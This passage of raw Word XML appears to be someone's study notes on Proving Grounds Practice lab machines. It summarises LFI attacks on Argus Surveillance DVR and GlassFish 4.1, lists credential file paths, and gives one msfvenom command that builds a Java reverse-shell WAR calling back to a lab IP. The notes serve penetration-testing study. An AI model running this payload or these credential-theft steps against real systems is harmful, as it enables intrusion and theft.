                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1372"/>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3AD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5495925" cy="3505200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="234" name="image235.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image235.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1373"/>
                    <a:srcRect b="0" l="0" r="7532" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495925" cy="3505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it finally worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5181600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="285" name="image282.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image282.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1374"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="51816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3AD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this FTP server, we saw website source code, and then this really weird file name. So we were supposed to infer that this was a webpage too, and try accessing that endpoint, and we got creds from it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId1375">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SpiderSociety</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FileZilla 0.9.41 beta was mentioned to be seen a lot but never exploited</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1376">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ADF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Argus Surveillance DVR 4.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1377">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DVR4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice (Windows). First, they used an exploit from exploitDB to get LFI, which they used to get SSH key. The found the username through the website which they used to guess the location of the SSH key. And then they used a second exploit to decrypt a special Argus Survelliance password stored in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to find the password for the Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1378">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is another good writeup which is longer but it provides a list of special characters to try and guess what it is since the password crack said the last character was "unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Special characters list: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!@#$%^&amp;*()?_-+=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1379">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/45296</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1380">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50130</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking password encryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GlassFish Server Open Source Edition 4.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1381">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice through an LFI exploit. After searching online for GlassFish 4 config files to look at, we found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glassfish4/glassfish/domains/domain1/config/admin-keyfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glassfish4/glassfish/domains/domain1/config/local-password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">both of which had creds but were not crackable. And we could also read proof.txt! And then we later used it to read the config file of another service (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Synametrics File Manager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) which gave us creds for PE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for privilege escalation, we exploited </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GlassFish Server Open Source Edition 4.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again. We used credentials to login, and then we enumerated the website which allowed us to upload a reverse shell. We saw the webpage was .jsf which is java related, so I think they must have used this as a hint to use a java rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.222 LPORT=443 -f war &gt;shell.war</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEA">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Synametrics File Manager </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1382">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice since we had LFI from a previous exploit and we used that LFI to look at the config file of Synametrics File Manager that we searched up and found to be in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /synaman/config/AppConfig.xml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="657"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also the config path can be found here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1383">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/45387</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mantis Bug Tracker (Mantis BT) was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1384">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mantis</w:t>
        </w:r>
      </w:hyperlink>
